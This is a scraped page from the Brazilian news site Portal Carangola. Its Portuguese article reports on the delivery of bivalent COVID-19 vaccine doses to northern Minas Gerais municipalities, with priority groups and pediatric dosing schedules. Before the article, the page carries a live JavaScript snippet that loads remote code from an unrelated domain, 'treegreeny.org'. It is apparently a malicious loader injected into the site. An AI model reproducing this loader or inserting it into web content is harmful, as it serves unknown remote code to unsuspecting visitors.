;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Norte de Minas recebe 49,3 mil doses de vacinas bivalentes contra a covid - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Norte de Minas recebe 49,3 mil doses de vacinas bivalentes contra a covid

Os 86 municípios que compõem a macrorregião de saúde Norte começam a receber na sexta-feira, 17 de fevereiro, a primeira remessa de 49.332 doses de vacinas bivalentes da Pfizer/BioNtech contra a covid-19. Para 54 municípios da área de atuação da Superintendência Regional de Saúde (SRS) de Montes Claros foram entregues 28.854 doses de imunizantes. Outras 17.352 doses de vacinas serão repassadas a 25 municípios da área de atuação da Gerência Regional de Saúde (GRS) de Januária. Sete municípios da GRS de Pirapora receberão 3.126 doses de imunobiológicos.

Os municípios da SRS Montes Claros que possuem maior população e que, por isso, receberão maior quantidade de vacinas bivalentes são: Montes Claros ( 7.986 doses); Janaúba (2.574); Salinas (1.542); Porteirinha (1.428); Monte Azul (1.020); Bocaiúva (996); Espinosa (930); Taiobeiras (846); Coração de Jesus (738); Jaíba (696); Francisco Sá (684); Mamonas e Rio Pardo de Minas (612 doses para cada município); São João do Paraíso (552) e Matias Cardoso (504).

Em virtude do feriado prolongado de Carnaval, a Superintendência Regional de Saúde alerta os gestores municipais que providenciem o recebimento das vacinas nesta sexta-feira para redobrar o cuidado com a conservação dos imunobiológicos para evitar perdas. Já os municípios que preferirem receber as vacinas depois do carnaval, deverão agendar com a SRS o dia da entrega.

 

A coordenadora de vigilância em saúde da SRS, Agna Soares da Silva Menezes explica que dia 27 de fevereiro o Ministério da Saúde iniciará a realização de campanha nacional de vacinação com doses de reforço de vacinas bivalentes. Na primeira fase da campanha deverão comparecer às unidades de saúde pessoas com idade a partir de 70 anos; pessoas que trabalham ou moram em instituições de longa permanência com idade a partir de 12 anos; pessoas imunocomprometidas e integrantes de comunidades indígenas, ribeirinhas e quilombolas.

Posteriormente, a campanha terá mais quatro etapas, com os seguintes grupos prioritários para recebimento de uma dose de vacina bivalente: pessoas com idade entre 60 e 69 anos; gestantes e puérperas; trabalhadores da saúde e pessoas com deficiência permanente.

Nota Técnica enviada pela Secretaria de Estado de Saúde de Minas Gerais (SES-MG) às secretarias municipais de saúde destaca a importância da nova etapa da campanha de vacinação contra a covid-19, com a utilização de vacina bivalente.

Segundo a Nota Técnica, considerando “as análises e acompanhamento dos estudos epidemiológicos e eficácia das vacinas covid-19, observou-se uma redução da proteção imunobiológica ao longo do tempo, destacando os idosos de 60 anos ou mais, a faixa etária mais atingida. Essa redução da proteção se mostrou mais proeminente com a variante Ômicron”. Desta forma, completa a Nota Técnica, “é preciso considerar as novas variantes e o curso epidemiológico da doença, com a finalidade de impedir uma nova onda de morbimortalidade agressiva como no passado”.

A vacina bivalente contra a covid-19 inclui ácido ribonucleico (RNA) que codifica a proteína “spike”, da cepa original de SARS-CoV-2 e da Ômicron, bem como das variantes BA.4 e BA.5. Essa vacina é recomendada para pessoas com 12 anos ou mais de idade, com aplicação de uma dose em quem já concluiu o esquema primário de duas doses com vacinas monovalentes. O intervalo para aplicação de doses de reforço com vacinas bivalentes é de quatro meses da última dose de reforço ou última dose do esquema primário com vacinas monovalentes.

Pessoas que não fazem parte do grupo prioritário para as doses de reforço de vacinas bivalentes e que não iniciaram a vacinação, ou que estão com o esquema de duas doses incompleto, deverão completar o esquema vacinal com as vacinas monovalentes.

Já a aplicação de doses de reforço para pessoas que não estão nos grupos prioritários de recebimento de imunizantes bivalentes será realizada com vacina monovalente disponível nas unidades de saúde.

 

Crianças

Para a continuidade da vacinação de crianças a partir de cinco anos de idade, a partir desta sexta-feira a Superintendência Regional de Saúde de Montes Claros também estará disponibilizando 4.570 doses de vacinas da Pfizer pediátrica para 54 municípios. Para a Secretaria Municipal de Saúde de Montes Claros serão entregues 1.570 doses de vacinas da Pfizer pediátrica. As demais localidades que recebem os maiores quantitativos são: Janaúba (290 doses); Bocaiúva e Jaíba (200 doses para cada município); Salinas (150); Porteirinha e Taiobeiras (130 doses para cada localidade); Espinosa e Rio Pardo de Minas (120); Coração de Jesus (110) e Francisco Sá (100 doses).

Todas as crianças entre 5 e 11 anos de idade, incluindo imunocomprometidas e com comorbidades, que receberam o esquema primário com vacina Pfizer pediátrica ou CoronaVac, poderão receber uma dose de reforço da vacina Pfizer monovalente com intervalo mínimo de quatro meses após a segunda dose. Na falta de vacina da Pfizer para o reforço, a vacina CoronaVac poderá ser utilizada.

Já crianças de 6 meses a 2 anos, 11 meses e 29 dias que já iniciaram o esquema com a vacina da Pfizer (frasco de tampa vinho) deverão completar o esquema primário de três doses com a mesma vacina. Para isso, pais ou responsáveis pelas crianças deverão respeitar o intervalo de quatro semanas entre a primeira e a segunda dose e oito semanas entre a segunda e a terceira dose.

Para crianças que ainda vão começar o esquema vacinal na faixa etária de 6 meses a 4 anos, 11 meses e 29 dias, será aplicada vacina da Pfizer (frasco de tampa vinho) no esquema primário de três doses com intervalo de quatro semanas entre a primeira e a segunda dose e oito semanas entre a segunda e terceira dose.

Crianças de 3 a 4 anos que iniciaram o esquema vacinal com a vacina CoronaVac deverão completar o esquema primário de duas doses com o mesmo imunizante, com intervalo mínimo de quatro semanas entre a primeira e a segunda dose. Posteriormente deverá ser aplicada dose de reforço, preferencialmente com vacina da Pfizer (frasco tampa vinho) com intervalo mínimo de quatro meses após a aplicação da segunda dose.

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.